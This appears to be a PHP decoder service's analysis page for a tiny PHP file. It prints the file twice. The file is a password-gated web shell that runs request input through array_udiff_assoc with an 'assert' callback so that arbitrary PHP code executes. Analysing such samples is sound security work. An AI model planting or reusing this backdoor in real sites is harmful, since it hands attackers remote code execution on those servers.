Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php /** * Noticed: (PHP 5 >= 5.4.0, PHP 7) * */ $password = "LandGrey"; array_udif..

Decoded Output download

<?php 
/** 
* Noticed: (PHP 5 >= 5.4.0, PHP 7) 
* 
*/ 
$password = "LandGrey"; 
array_udiff_assoc(array($_REQUEST[$password]), array(1), "assert"); 
?> 

Did this file decode correctly?

Original Code

<?php
/**
* Noticed: (PHP 5 >= 5.4.0, PHP 7)
*
*/
$password = "LandGrey";
array_udiff_assoc(array($_REQUEST[$password]), array(1), "assert");
?>

Function Calls

array_udiff_assoc 1

Variables

$password LandGrey

Stats

MD5 8f649009a6a0f64f359cb8a356732e55
Eval Count 0
Decode Time 106 ms